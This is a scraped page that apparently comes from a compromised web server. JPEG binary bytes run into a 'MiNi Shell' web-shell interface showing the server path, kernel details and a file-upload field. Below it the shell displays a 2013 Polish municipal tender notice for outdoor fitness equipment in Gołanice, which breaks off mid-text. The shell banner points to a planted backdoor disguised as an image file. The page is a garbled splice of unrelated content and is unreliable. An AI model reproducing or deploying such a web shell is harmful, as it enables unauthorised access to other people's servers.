JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130612/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130612/108787-N-2013.html

<p class="kh_header"><b>Święciechowa: Utworzenie Paku Fitness w miejscowości Gołanice</b><br>
<b>Numer ogłoszenia: 108787 - 2013; data zamieszczenia: 12.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Święciechowa , ul. Ułańska 4, 64-115 Święciechowa, woj. wielkopolskie, tel. 065 5333510, faks 065 5299548.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swieciechowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utworzenie Paku Fitness w miejscowości Gołanice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Na przedmiot zamówienia składa się wyposażenie Parku Fitness (siłowni zewnętrznej) 
w Gołanicach - to jest dostawa i montaż urządzeń rekreacyjnych do uprawiania sportów na wolnym powietrzu w siłowni zewnętrznej w Gołanicach (działka nr 350) wraz z wykonaniem niezbędnych  robót budowlanych. 1.  Zakres zamówienia obejmuje w szczególności: 1) dostawę oraz montaż nowych fabrycznie urządzeń wymienionych w załączniku nr 2 do SIWZ lub równoważnych urządzeń o podobnych standardowych rozwiązaniach stosowanych, a mieszczących się w granicach tolerancji umożliwiających uzyskanie założenia Zamawiającego, w postaci: a) urządzenia o nazwie: prasa nożna podwójna - 1 szt. - prasa nożna służąca do budowy mięśni kończyn dolnych, wpływająca na prawidłowe funkcjonowanie nóg o nieznacznym obciążeniu stawów; urządzenia montowane obustronnie pomiędzy dwoma nogami pylona. Pylon jest miejscem informacyjnym i spełnia rolę tablicy. Na tablicy pylona znajduje się także instrukcja użytkowania urządzenia.  b) urządzenia o nazwie: twister + wahadło - 1 szt. - urządzenie wspomaga aktywność stawów biodrowych oraz kręgosłupa lędźwiowego; ćwiczy zmysł równowagi oraz pozytywnie wpływa na mięśnie brzucha. Urządzenia montowane obustronnie pomiędzy dwoma nogami pylona. Pylon jest miejscem informacyjnym i spełnia rolę tablicy. Na tablicy pylona znajduje się także instrukcja użytkowania urządzenia. c) urządzenia o nazwie: narciarz biegowy - 1 szt. -  urządzenie imitujące ruchy narciarza biegowego, przeznaczone do kształtowania mięśni nóg i ramion. Urządzenie wolnostojące wraz z tabliczką na której znajduje się instrukcja użytkowania urządzenia. d) urządzenia o nazwie: wiosła - 1 szt. - urządzenie, którego praca przypomina wiosłowanie, ćwiczy mięśnie brzucha, ramion i rąk. Urządzenie wolnostojące wraz z tabliczką na której znajduje się instrukcja użytkowania urządzenia. e) urządzenia o nazwie: stepper - 1 szt. - praca urządzenia polega na imitowaniu ruchu przypominającego wchodzenie po schodach oraz bieg. Przeznaczone jest przede wszystkim do ćwiczenia mięśni nóg. Urządzenie wolnostojące wraz z tabliczką na której znajduje się instrukcja użytkowania urządzenia. f) urządzenia o nazwie: rowerek - 1 szt. - urządzenie imitujące ruchy wykonywane podczas jazdy na rowerze, ćwiczy dolne partie mięśni (nogi, uda, brzuch) i poprawia ogólną kondycję. Urządzenie wolnostojące wraz z tabliczką na której znajduje się instrukcja użytkowania urządzenia. g) urządzenia o nazwie: przyrząd do ćwiczeń klatki piersiowej - 1 szt. - urządzenie do ćwiczeń mięśni klatki piersiowej rozwijające mięśnie ramion, pleców, klatki piersiowej i rąk. Urządzenie wolnostojące wraz z tabliczką na której znajduje się instrukcja użytkowania urządzenia. h) urządzenia o nazwie: motyl - 1 szt. - urządzenia do kształtowania mięśni grzbietu oraz klatki piersiowej. Urządzenie wolnostojące wraz z tabliczką na której znajduje się instrukcja użytkowania urządzenia. i) urządzenie o nazwie: ławka do ćwiczeń mięśni uda - 1szt. - urządzenie przeznaczone do kształtowania mięśni nóg poprzez podnoszenie obciążenia o wadze wzrastającej. Ćwiczenia można wykonywać w pozycji leżącej na plecach lub na brzuchu. Urządzenie wolnostojące wraz z tabliczką na której znajduje się instrukcja użytkowania urządzenia. j) urządzenie o nazwie: przyrząd do ćwiczeń brzucha - 1 szt. -  urządzenie rozwijające przede wszystkim mięśnie brzucha, ale także mięśnie ramion i nóg. Urządzenie wolnostojące wraz z tabliczką na której znajduje się instrukcja użytkowania urządzenia. k) urządzenie o nazwie: drążek uniwersalny - 1 szt. - urządzenie do ćwiczeń na powietrzu przeznaczone do różnych ćwiczeń wykorzystujących ciężar własnego ciała. Urządzenie wolnostojące wraz z tabliczką na której znajduje się instrukcja użytkowania urządzenia. 2.  Podane w SIWZ nazwy urządzeń, materiałów i technologicznych rozwiązań systemowych należy traktować jako przykładowe, ze względu na zasady ustawy Prawo zamówień publicznych. Oznacza to, że Wykonawca może zaoferować inne  równoważne urządzenia zgodne z  zastrzeżeniem, że urządzenia te muszą być o standardzie, co najmniej takim samym lub wyższym od opisanych w SIWZ oraz muszą być zgodne z wszelkimi wymaganiami normy PN-EN 1176-1:2009 (Wyposażenie placów zabaw i nawierzchnie. Ogólne wymagania bezpieczeństwa i metody badań) oraz PN-EN 957-1:2006 (Stacjonarny sprzęt treningowy. Wymagania ogólne). Wskazane w załączniku nr 2 do SIWZ parametry dotyczące grubości elementów ze stali ocynkowanej należy traktować jako minimalne.
3. Wykonawca ma obowiązek zachować minimalne strefy ochronne montowanych urządzeń; przestrzegać zaleceń instrukcji montażu poszczególnych urządzeń; zastosować wyroby i urządzenia posiadające aprobaty techniczne i inne dokumenty normujące wprowadzenie wyrobów do obrotu. 4. Wykonawca zobowiązany jest do realizacji dostawy na własny koszt, przy udziale własnego środka transportu lub może zlecić na swój koszt i ryzyko dostawę przewoźnikowi. 5. Wykonawca zobowiązany jest należycie zabezpieczyć towar na czas transportu oraz ponosi całkowitą odpowiedzialność i ryzyko ewentualnego uszkodzenia lub utraty urządzeń objętych SIWZ  w czasie transportu. Urządzenia w trakcie transportu i montażu (do momentu odbioru urządzeń przez zamawiającego)  pozostają własnością wykonawcy. 6. Wykonawca zobowiązany jest prowadzić roboty związane z montażem urządzeń w taki sposób, aby nie wystąpiły uszkodzenia infrastruktury zlokalizowanej na terenie placu montażu urządzeń oraz obiektów i infrastruktury zlokalizowanej poza terenem placu montażu urządzeń; w przypadku wystąpienia uszkodzeń tych obiektów lub/i infrastruktury, Wykonawca zobowiązany jest do naprawy uszkodzeń lub odtworzenia tych obiektów lub/i infrastruktury. Wykonawca jest zobowiązany do natychmiastowego usunięcia wszelkich szkód i awarii spowodowanych przez Wykonawcę.  7. Na czas wykonywania zamówienia Wykonawca zobowiązany jest do odpowiedniego zabezpieczenia terenu montażu, umieszczenia na tym terenie w widocznym miejscu tablicy informacyjnej oraz danych dotyczących bezpieczeństwa pracy i ochrony zdrowia. 8. Wykonawca zobowiązuje się zorganizować montaż własnym staraniem i na własny koszt, zapewnić na własny koszt ochronę mienia przed jego utratą lub uszkodzeniem. Wykonawca jest zobowiązany przestrzegać warunki B.H.P. i p. poż. oraz utrzymać porządek na placu montażu. 9. Wykonawca zobowiązany jest do sporządzenia i dostarczenia Zamawiającemu dokumentacji powykonawczej.  10. Wykonawca zobowiązany jest udzielić 12 - miesięcznej rękojmi za wady i 36 - miesięcznej gwarancji na przedmiot zamówienia licząc od daty odbioru końcowego. Wykonawca w okresie gwarancji zobowiązany będzie do wykonania przynajmniej raz w roku przeglądów gwarancyjnych zamontowanych urządzeń siłowni, bez prawa do dodatkowego wynagrodzenia, przy udziale Zamawiającego i w terminie z nim ustalonym. Koszt przeglądów należy uwzględnić w cenie oferty. Termin wykonania pierwszego przeglądu ustala się w okresie od upływu 11 miesięcy do upływu terminu 12 miesięcy od dnia odbioru przedmiotu umowy. W trakcie przeglądu gwarancyjnego wykonawca jest zobowiązany dokonać na własny koszt konserwacji urządzeń rekreacyjnych oraz usunąć również na własny  koszt  stwierdzone wady i usterki  w termie 14 dni od ich stwierdzenia. Na przedmiotową inwestycję został złożony i wybrany do finansowania wniosek o dofinansowanie operacji w ramach Programu Obszarów Wiejskich na lata 2007 - 2013, oś 4 LEADER, działanie 413 - Wdrażanie lokalnych strategii rozwoju w zakresie operacji, które nie odpowiadają warunkom przyznania pomocy w ramach osi 3 PROW, ale przyczyniają się do osiągnięcia celów tej osi, czyli tzw. małych projektów. Gmina Święciechowa na dzień ogłoszenia przetargu nie ma podpisanej umowy na ww. dofinansowanie ze środków Unii Europejskiej.
Kod CPV: Sprzęt do ćwiczeń fizycznych  37440000-4.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 37.44.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie będzie żądał od wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, gdy wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu - zał. nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, gdy wykonawca, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał co najmniej trzy zamówienia ( dostawy ) polegające na wykonaniu siłowni zewnętrznych odpowiadających swoim rodzajem i wartością dostawom ( w tym z montażem) stanowiącym przedmiot zamówienia i złoży wykaz tych zamówień zgodnie z załącznikiem nr 4 do SIWZ wraz z dowodami, czy zostały wykonane lub są wykonywane należycie oraz złoży oświadczenie o spełnianiu warunków udziału w postępowaniu - według zał. nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, gdy wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu - zał. nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, gdy wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu - zał. nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, gdy wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu - zał. nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Do oferty należy załączyć:
1) dokumenty dotyczące urządzeń rekreacyjnych, potwierdzające, że dostarczone urządzenia odpowiadają normom podanym w Rozdziale III SIWZ pkt 2 - certyfikaty zgodności z normami PN-EN 1176 oraz PN-EN 957.
2) rysunki, zdjęcia bądź wizualizacje oferowanych urządzeń do siłowni zewnętrznych 
(w formie papierowej bądź na płycie CD) z uwzględnieniem Rozdziału III SIWZ.
Ww. rysunki, zdjęcia bądź wizualizacje mają potwierdzać spełnienie przez Wykonawcę parametrów oferowanych urządzeń w załączniku nr 2 do SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Dowód dysponowania zasobami niezbędnymi do realizacji zamówienia w przypadku polegania na zdolnościach innych podmiotów, zgodnie z art. 26 ust. 2b ustawy, 
w szczególności pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda dokumentów dotyczących w szczególności:a) zakresu dostępnych wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. 2) Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy. Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający może żądać od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych 
w Rozdziale VI ust. 1 pkt 5-8 SIWZ.   3) W przypadku Wykonawców wspólnie ubiegający się o zamówienie:a) każdy z  wykonawców wspólnie ubiegających się o zamówienie (w tym członek Konsorcjum wspólnik spółki cywilnej ) musi złożyć dokumenty, o których mowa w Rozdziale VI ust. 1 pkt 4 - 8 SIWZ, b) pozostałe dokumenty Rozdział VI ust. 1 pkt 1 - 3 oraz 9 -10 SIWZ mogą być przedstawione przez jednego Wykonawcę lub wspólnie (przez pełnomocnika Konsorcjum, spółki cywilnej), w zależności od tego czy spełniają w tym zakresie warunki udziału każdy z osobna czy tylko łącznie.Ponadto Wykonawcy wspólnie ubiegający się o zamówienie: - zobowiązani są ustanowić Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. Przyjmuje się, że pełnomocnictwo do podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność z  oryginałem wszystkich dokumentów,- pełnomocnictwo musi mieć formę pisemną, dokument pełnomocnictwa musi być załączony do oferty. 4) Jeżeli, w przypadku wykonawcy mającego siedzibę na terytorium Rzeczypospolitej Polskiej, osoby, o których mowa w art. 24 ust. 1 pkt 5-8, 10 i 11 ustawy, mają miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, wykonawca składa w odniesieniu do nich zaświadczenie właściwego organu sądowego albo administracyjnego miejsca zamieszkania, dotyczące niekaralności tych osób w zakresie określonym w art. 24 ust. 1 pkt 5-8, 10 i 11 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, z tym że w przypadku gdy w miejscu zamieszkania tych osób nie wydaje się takich zaświadczeń - zastępuje się je dokumentem zawierającym oświadczenie złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania tych osób lub przed notariuszem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne postanowienia umowy zawarte zostały we wzorze umowy - Załącznik nr 7. W przypadku, gdy zamówienie będzie realizowane z udziałem podwykonawców umowa zostanie uzupełniona o stosowne zapisy, jak również o zapisy dotyczące solidarnej odpowiedzialności. Zamawiający  we wzorze umowy przewidział możliwość jej  zmiany i określił warunki zmiany. 1. Zmiana warunków umowy w stosunku do treści oferty Wykonawcy jest możliwa za zgodą stron, w następujących przypadkach:
1) zmiana terminu wykonania umowy -  jest możliwa z powodu warunków przyrodniczych (prace polegające na montażu urządzeń przebiegają w  odmiennych warunkach niż przewidziano w SIWZ, np. skały w podłożu), warunków pogodowych (np. ulewne deszcze przez kilka dni uniemożliwiające wykonywanie zamówienia w terminie), klęsk żywiołowych i katastrof; 2) zmiany zakresu przedmiotu umowy -  jest możliwy tylko na korzyść Zamawiającego i może nastąpić tylko, gdy wykonanie zamówienia w pierwotnym zakresie nie jest możliwe do wykonania z przyczyn niezależnych od stron. Zmniejszenie zakresu zamówienia powoduje obniżenie wynagrodzenia zgodnie  pkt. 3. Zmniejszenie zakresu prac przedmiotu umowy w stosunku do zakresu określonego w specyfikacji istotnych warunków zamówienia dla przetargu, nie stanowi niewykonania lub nienależytego wykonania zobowiązania.
3) zmiana dotycząca zmniejszenia wysokości wynagrodzenia jest możliwa w przypadku, o którym mowa pod pkt 2. Wynagrodzenie w takiej sytuacji zostanie zmniejszone w oparciu o stawki jednostkowe wymienione w ofercie z uwzględnieniem ilości rzeczywiście niewykonanych dostaw, 4) w uzasadnionych przypadkach strony mogą ustalić, że zamiast wskazanego w ofercie  urządzenia rekreacyjnego  wykonawca dostarczy urządzenie rekreacyjne zamienne, które będzie posiadało parametry techniczne co najmniej takie, jak wskazane w ofercie, 5) zmiany dopuszczalne w świetle ustawy - Prawo zamówień publicznych, w szczególności w zakresie zmiany formy zabezpieczenia należytego wykonania umowy, np. zabezpieczenie w gotówce na zabezpieczenie w formie gwarancji bankowej, 6) gdy konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego, 
